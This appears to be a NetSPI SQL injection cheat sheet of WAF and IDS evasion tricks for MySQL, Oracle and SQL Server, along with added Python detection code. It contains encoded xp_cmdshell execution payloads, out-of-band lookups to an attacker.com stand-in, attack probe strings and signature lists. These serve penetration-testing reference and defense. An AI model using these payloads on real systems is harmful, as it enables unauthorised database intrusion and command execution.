Obfuscating queries aids in bypassing Web Application Firewalls (WAFs) and Intrusion Detection/Prevention Systems (IDS/IPS). Below are examples of basic query obfuscations in MySQL syntax; they may need modification before they fit a particular injection point.
| Description | Query |
|---|---|
| ASCII > Char | SELECT char(65) |
| Char > ASCII | SELECT ascii('A') |
| Hex | SELECT 0x4A414B45 |
| Hex > Int | SELECT 0x20 + 0x40 |
| Unhex/hex | unhex(hex(user())) |
| Bitwise AND | SELECT 6 & 2 |
| Bitwise OR | SELECT 6 \| 2 |
| Bitwise Negation | SELECT ~6 |
| Bitwise XOR | SELECT 6 ^ 2 |
| Right Shift | SELECT 6>>2 |
| Left Shift | SELECT 6<<2 |
| Substring | SELECT substr('abcd', 3, 2)<br>substr(string, index, length) |
| Casting | SELECT cast('1' AS unsigned integer)<br>SELECT cast('123' AS char) |
| Concatenation | SELECT concat('net','spi')<br>SELECT 'n' 'et' 'spi' |
| No Quotes | SELECT CONCAT(CHAR(74),CHAR(65),CHAR(75),CHAR(69)) |
| Block comment | SELECT/*block comment*/"test" |
| Single line comment | SELECT 1 -- comments out rest of line<br>SELECT 1 # comments out rest of line<br>SELECT 1 --+ comments out rest of line<br>SELECT 1 --+- comments out rest of line<br>SELECT 1 -- - comments out rest of line<br>SELECT 1 %00 comments out rest of line |
| In-line comment | SEL/*_*/ECT * FR/*_*/OM |
| No Spaces | SELECT(username)FROM(USERS)WHERE(username='netspi') |
| Allowed Whitespaces | 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0xA0, 0x20 (byte values that the parser treats as whitespace) |
| URL Encode | SELECT%20%2A%20FROM%20USERS |
| Double URL Encode | SELECT%2520%2A%2520FROM%2520USERS |
| Invalid Percent Encode | %SEL%ECT * F%R%OM U%S%ERS |
| Character case obfuscation | SeLeCt * FrOm |
Obfuscating queries aids in bypassing Web Application Firewalls (WAFs) and Intrusion Detection/Prevention Systems (IDS/IPS). Below are examples of basic query obfuscations in Oracle syntax; they may need modification before they fit a particular injection point.
| Description | Query |
|---|---|
| ASCII > Char | SELECT char(65) from dual |
| Char > ASCII | SELECT ascii('A') from dual |
| Bitwise AND | SELECT 6 & 2 from dual |
| Bitwise OR | SELECT 6 \| 2 from dual |
| Bitwise Negation | SELECT ~6 from dual |
| Bitwise XOR | SELECT 6 ^ 2 from dual |
| Select Nth Char | SELECT substr('abcd', 3, 1) FROM dual; -- Returns 3rd character, 'c' |
| Substring | SELECT substr('abcd', 3, 2) from dual<br>substr(string, index, length) |
| Casting | select CAST(12 AS CHAR(32)) from dual |
| Concatenation | SELECT concat('net','spi') from dual |
| Comments | SELECT 1 FROM dual -- comment |
| If Statement | BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; |
| Case Statement | SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; -- Returns 1<br>SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; -- Returns 2 |
| Time Delay | BEGIN DBMS_LOCK.SLEEP(5); END; (Requires Privileges)<br>SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual;<br>SELECT UTL_INADDR.get_host_address('blah.attacker.com') FROM dual;<br>SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual; |
| Select Nth Row | SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; -- Returns 9th row |
| Bitwise AND | SELECT bitand(6,2) FROM dual; -- Returns 2<br>SELECT bitand(6,1) FROM dual; -- Returns 0 |
| String Concatenation | SELECT 'A' || 'B' FROM dual; -- Returns AB |
| Avoiding Quotes | SELECT chr(65) || chr(66) FROM dual; -- Returns AB |
| Hex Encoding | SELECT 0x75736572 FROM dual; |
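As an added example that is not part of the cheat sheet, the following Python normalizer undoes the encoding, comment and whitespace tricks from the MySQL and Oracle tables above before a rule is matched, so a WAF or IDS rule sees one canonical form instead of the raw parameter. The signature list and the probe strings are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, unquote_plus

# Every byte MySQL accepts as whitespace: 09 0A 0B 0C 0D A0 20
_WS = re.compile(r"[\t\n\x0b\x0c\r\xa0 ]+")
_BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
_LINE_COMMENT = re.compile(r"(?:--|#).*?$", re.MULTILINE)
_BAD_PERCENT = re.compile(r"%(?![0-9A-Fa-f]{2})")
# Assumed rule set; it is matched against the normalized text, never the raw parameter
_SIGNATURES = [re.compile(p) for p in (
    r"\bselect\b.*\bfrom\b", r"\bunion\b.*\bselect\b", r"\bwaitfor\s+delay\b",
    r"\bxp_cmdshell\b", r"\bdbms_lock\.sleep\b", r"\butl_(?:http|inaddr)\b")]


def normalize_query(raw, max_rounds=3):
    """Canonicalize one request parameter before signature matching."""
    # 1. Query-string decoding ('+' is a space), then more rounds for double encoding.
    #    latin-1 keeps each byte as one character, so %A0 survives as \xa0.
    text = unquote_plus(raw, encoding="latin-1")
    for _ in range(max_rounds - 1):
        decoded = unquote(text, encoding="latin-1")
        if decoded == text:
            break
        text = decoded
    # 2. Drop a '%' that is not a valid escape, as some servers do (%S%ELECT -> SELECT).
    text = _BAD_PERCENT.sub("", text)
    # 3. A NUL (%00) ends the statement for the parser; everything after it is dead.
    text = text.split("\x00", 1)[0]
    # 4. Delete block comments outright so SEL/*_*/ECT rejoins, then -- and # comments.
    text = _BLOCK_COMMENT.sub("", text)
    text = _LINE_COMMENT.sub("", text)
    # 5. Collapse every accepted whitespace byte to one space and fold case.
    return _WS.sub(" ", text).strip().lower()


def matches_signature(raw):
    """True when the canonical form of the parameter hits any rule."""
    norm = normalize_query(raw)
    return any(p.search(norm) for p in _SIGNATURES)


# Constructed probes, one per trick from the tables above; none is captured traffic
PROBES = (
    "SELECT%2520%2A%2520FROM%2520USERS",                      # double URL encoding
    "SeLeCt/*_*/*/*_*/FrOm%09users",                           # case, in-line comments, tab
    "%S%ELECT * F%ROM U%SERS",                                 # invalid percent sequences
    "SELECT(username)FROM(USERS)WHERE(username='netspi')",     # no spaces
    "%0dwaitfor+delay+'0:0:10'--",                             # CR instead of ';', '+' as space
)
```

Block comments are deleted rather than replaced by a space on purpose: the attacker relies on the halves rejoining, and a substring rule on the joined text cannot be split by `/**/`.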
Obfuscating queries aids in bypassing Web Application Firewalls (WAFs) and Intrusion Detection/Prevention Systems (IDS/IPS). Below are examples of basic query obfuscations in Microsoft SQL Server (T-SQL) syntax; they may need modification before they fit a particular injection point.
| Description | Query |
|---|---|
| ASCII > Char | SELECT char(65) |
| Char > ASCII | SELECT ascii('A') |
| Hex > Int | SELECT 0x20 + 0x40 |
| Bitwise AND | SELECT 6 & 2 |
| Bitwise OR | SELECT 6 \| 2 |
| Bitwise Negation | SELECT ~6 |
| Bitwise XOR | SELECT 6 ^ 2 |
| Substring | SELECT substring('abcd', 3, 2)<br>substring(string, index, length) |
| Casting | SELECT cast('1' AS unsigned integer)<br>SELECT cast('123' AS char) |
| Concatenation | SELECT concat('net','spi') |
| Comments | SELECT 1 --comment<br>SELECT/*comment*/1 |
| Avoiding Quotes | SELECT char(65)+char(66) -- returns AB |
| Avoid semicolon with %0d | %0dwaitfor+delay+'0:0:10'-- |
| Bypass Case Filtering | EXEC xP_cMdsheLL 'dir'; |
| Avoid Spaces - With Comments | EXEC/**/xp_cmdshell/**/'dir';--<br>';ex/**/ec xp_cmds/**/hell 'dir'; |
| Avoid Query Detection - with concatenation | DECLARE @cmd as varchar(3000);SET @cmd = 'x'+'p'+'_'+'c'+'m'+'d'+'s'+'h'+'e'+'l'+'l'+'/**/'+""+'d'+'i'+'r'+"";exec(@cmd); |
| Avoid Query Detection - Char Encoding | DECLARE @cmd as varchar(3000);SET @cmd =(CHAR(101)+CHAR(120)+CHAR(101)+CHAR(99)+CHAR(32)+CHAR(109)+CHAR(97)+CHAR(115)+CHAR(116)+CHAR(101)+CHAR(114)+CHAR(46)+CHAR(46)+CHAR(120)+CHAR(112)+CHAR(95)+CHAR(99)+CHAR(109)+CHAR(100)+CHAR(115)+CHAR(104)+CHAR(101)+CHAR(108)+CHAR(108)+CHAR(32)+CHAR(39)+CHAR(100)+CHAR(105)+CHAR(114)+CHAR(39)+CHAR(59));EXEC(@cmd); |
| Avoid Query Detection - Base64 Encoding | `DECLARE @data varchar(max), @XmlData xml;SET @data = 'ZXhlYyBtYXN0ZXIuLnhwX2NtZHNoZWxsICdkaXIn';SET @XmlData = CAST('<data>' + @data + '</data>' as xml);SET @data = CONVERT(varchar(max), @XmlData.value('(data)[1]', 'varbinary(max)'));exec (@data);` |
| Avoid Query Detection - Nchar Encoding | DECLARE @cmd as nvarchar(3000);SET @cmd =(nchar(101)+nchar(120)+nchar(101)+nchar(99)+nchar(32)+nchar(109)+nchar(97)+nchar(115)+nchar(116)+nchar(101)+nchar(114)+nchar(46)+nchar(46)+nchar(120)+nchar(112)+nchar(95)+nchar(99)+nchar(109)+nchar(100)+nchar(115)+nchar(104)+nchar(101)+nchar(108)+nchar(108)+nchar(32)+nchar(39)+nchar(100)+nchar(105)+nchar(114)+nchar(39)+nchar(59));EXEC(@cmd); |
| Avoid Query Detection - Binary Encoded ASCII + CAST | DECLARE @cmd as varchar(MAX);SET @cmd = cast(0x78705F636D647368656C6C202764697227 as varchar(MAX));exec(@cmd); |
| Avoid Query Detection - Binary Encoded ASCII + CONVERT | DECLARE @cmd as varchar(MAX);SET @cmd = convert(varchar(MAX),0x78705F636D647368656C6C202764697227);exec(@cmd); |
| Avoid Query Detection - varbinary(MAX) | DECLARE @cmd as varchar(MAX);SET @cmd = convert(varchar(0),0x78705F636D647368656C6C202764697227);exec(@cmd); |
| Avoid EXEC() - sp_sqlexec | DECLARE @cmd as varchar(3000);SET @cmd = convert(varchar(0),0x78705F636D647368656C6C202764697227);exec sp_sqlexec @cmd; |
| Execute xp_cmdshell 'dir' | DECLARE @tmp as varchar(MAX); SET @tmp = char(88)+char(80)+char(95)+char(67)+char(77)+ char(68)+char(83)+char(72)+char(69)+char(76)+char(76); exec @tmp 'dir'; |
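An added example, not NetSPI's code: a Python pass that reconstructs the strings hidden by the CHAR()/NCHAR() chains, hex literals, split literals and the base64-in-XML trick from the table above, extended to Oracle's chr() || chr() and MySQL's CONCAT(CHAR(),...) from the earlier tables, so that a detector can look for procedure names in the decoded text rather than in the encoded payload. The watched procedure list and the sample statement are assumptions.

```python
import base64
import re

# CHAR(n)/NCHAR(n)/chr(n) runs joined by '+', '||' or ',' (T-SQL, Oracle, MySQL CONCAT)
_CHAR_CHAIN = re.compile(
    r"\b(?:n?char|chr)\(\d+\)(?:\s*(?:\+|\|\||,)\s*(?:n?char|chr)\(\d+\))*", re.IGNORECASE)
_CHAR_NUM = re.compile(r"\((\d+)\)")
_HEX_LITERAL = re.compile(r"0x((?:[0-9a-f]{2}){2,})", re.IGNORECASE)  # two bytes or more
_LITERAL_PAIR = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")              # 'x'+'p' -> 'xp'
_B64_LITERAL = re.compile(r"'([A-Za-z0-9+/]{16,}={0,2})'")
_BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
_PROCS = ("xp_cmdshell", "sp_sqlexec")  # assumed watch list, taken from the table above

def _printable(data):
    return all(32 <= b < 127 for b in data)

def _decode_hex(m):
    raw = bytes.fromhex(m.group(1))
    return raw.decode("ascii") if _printable(raw) else m.group(0)

def _decode_b64(m):  # the CAST(... as xml).value(..., 'varbinary(max)') trick
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:
        return m.group(0)
    return "'%s'" % raw.decode("ascii") if _printable(raw) else m.group(0)

def reveal_encoded_strings(sql):
    """Rewrite the statement so each encoded fragment shows the text the
    server would reconstruct at run time, ready for plain signature matching."""
    text = _BLOCK_COMMENT.sub("", sql)
    text = _CHAR_CHAIN.sub(lambda m: "".join(
        chr(int(n)) for n in _CHAR_NUM.findall(m.group(0)) if int(n) < 0x110000), text)
    text = _HEX_LITERAL.sub(_decode_hex, text)
    while True:  # merge adjacent literals until no 'a'+'b' pair is left
        merged = _LITERAL_PAIR.sub(r"'\1\2'", text)
        if merged == text:
            break
        text = merged
    return _B64_LITERAL.sub(_decode_b64, text)

def dangerous_procs(sql):
    """Watched procedure names present once the encoding is undone."""
    revealed = reveal_encoded_strings(sql).lower()
    return [p for p in _PROCS if p in revealed]

# Constructed sample (the hex spells xp_cmdshell 'dir'), not captured traffic
SAMPLE = ("DECLARE @cmd as varchar(MAX);SET @cmd = cast(0x78705F636D647368656C6C20276469"
          "7227 as varchar(MAX));exec(@cmd);")
```

The `\b` before `char` matters: without it the `char(3000)` inside `varchar(3000)` would be decoded as a code point and corrupt the statement.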
© 2024 Copyright by NetSPI. All rights reserved.